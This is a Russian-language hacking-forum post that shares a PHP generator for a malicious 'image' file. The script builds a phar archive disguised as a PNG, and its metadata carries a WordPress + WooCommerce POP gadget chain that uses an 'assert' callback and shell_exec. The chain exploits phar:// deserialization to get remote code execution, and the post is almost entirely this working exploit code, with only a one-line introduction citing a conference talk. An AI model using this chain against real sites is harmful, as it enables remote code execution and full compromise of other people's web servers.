Показать сообщение отдельно
Старый 22.08.2018, 14:22   #66
crlf
 
Аватар для crlf
 
Регистрация: 29.09.2015
Сообщений: 101
Репутация: 17
По умолчанию

Генератор "полезной" картинки для эксплоита бага из доклада File Operation Induced Unserialization via the “phar://” Stream Wrapper

Wordpress + WooCommerce RCE POP chain

PHP код:
<?php
 
class Requests_Utility_FilteredIterator extends ArrayIterator{
   
 protected 
$callback;
 
 public function 
__construct(){
    
$this->callback 'assert';
 }
 
}
 
class 
WC_Log_Handler_File{
 
 protected 
$handles;
 
 public function 
__construct(){
    
$this->handles = new Requests_Utility_FilteredIterator;
    
$this->handles[] = 'die(shell_exec("ls -la"));';
 }
 
}
 
function 
img(){
    
ob_start();
    
imagepng(imagecreatetruecolor(200200));
    return 
ob_get_clean();
}
 
$n 'image.phar';
$p = new Phar($n);
$p->setStub(img().'__HALT_COMPILER();');
$p->setMetadata(new WC_Log_Handler_File);
$p['x'] = '';
rename($n$n.'.png');
crlf вне форума   Ответить с цитированием